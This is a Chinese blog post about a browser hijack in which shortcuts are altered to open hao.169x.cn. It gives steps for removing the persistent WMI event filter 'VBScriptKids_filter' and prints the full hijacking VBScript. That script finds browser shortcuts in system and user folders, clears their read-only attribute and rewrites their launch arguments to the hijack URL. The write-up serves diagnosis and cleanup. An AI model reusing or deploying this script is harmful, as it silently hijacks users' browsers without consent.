浏览器被定向至http://hao.169x.cn/?v=108-优快云博客

浏览器快捷方式被篡改，自动附加http://hao.169x.cn/?v=108参数，通过分析脚本，发现系统中所有浏览器被监听。解决方案包括：从官网下载安全软件，以管理员权限运行，清理恶意脚本，修改快捷方式参数。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

原因

浏览器快捷方式属性里被加上该URL参数，修改后依然被改过来。存在脚本事件监听。本文附上了脚本内容，可以看到它查找了系统内所能有的所有浏览器。

解决方法

在官网下载WMI Administrative Tools
管理员身份运行 WMI Event Viewer
Filters in : root\CIMV2 点 Connect
在__EventFilter下删除__EventFilter.name="VBScriptKids_filter"
修改快捷方式参数，去掉该URL

脚本内容

On Error Resume Next

Const link = "http://hao.169x.cn/?v=108"

Const link360 = "http://hao.169x.cn/?v=108&s=3"

browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\xxx\Desktop,C:\Users\xxx\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\xxx\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\xxx\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\xxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = Split(browsers,",")

Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next

lnkpathsArr = Split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")

For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
Next

Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")

For Each oFolder In oFolders
    If fso.FolderExists(oFolder) Then
        For Each file In fso.GetFolder(oFolder).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                Set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                If oDic.Exists(LCase(name)) Then
                    If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = link360
                    Else
                        oShellLink.Arguments = link
                    End If
                    If file.Attributes And 1 Then
                        file.Attributes = file.Attributes - 1
                    End If
                    oShellLink.Save
                End If
            End If
        Next
    End If
Next